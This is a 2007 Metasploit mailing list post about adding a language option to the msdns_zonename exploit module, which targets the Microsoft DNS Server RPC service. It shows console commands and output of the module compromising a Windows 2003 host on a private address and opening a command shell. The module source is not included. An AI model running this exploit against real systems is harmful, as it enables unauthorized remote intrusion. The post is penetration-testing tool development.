Metasploit mailing list archives

msdns_zonename (rev 4711)


From: fab at revhosts.net (Fabrice MOURRON)
Date: Fri, 20 Apr 2007 00:46:14 +0200

With the last release of this module, I had some pain finding an easy way to implement the French targets with the automatic mode.

So, I added a new OptString to select the country language and I added some conditions.

It's not very sexy, but it's the easiest way to implement the next targets for other languages ;-)


msf exploit(msdns_zonename) > show options

Module options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    Language  English          no        Language for automatic target: English, French
    RHOST     192.168.0.200    yes       The target address
    RPORT     0                yes       The target port


Payload options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread, process
    LPORT     4444             yes       The local port


Exploit target:

    Id  Name
    --  ----
    0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(msdns_zonename) > set Language French
Language => French
msf exploit(msdns_zonename) > rexploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 2189
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Windows 2003 Server SP1-SP2 French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:192.168.0.200[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:192.168.0.200[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 4 opened (192.168.0.2:50275 -> 192.168.0.200:4444)

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: text/x-ruby-script
Size: 7813 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070420/9387ee29/attachment.bin>
@+

Fab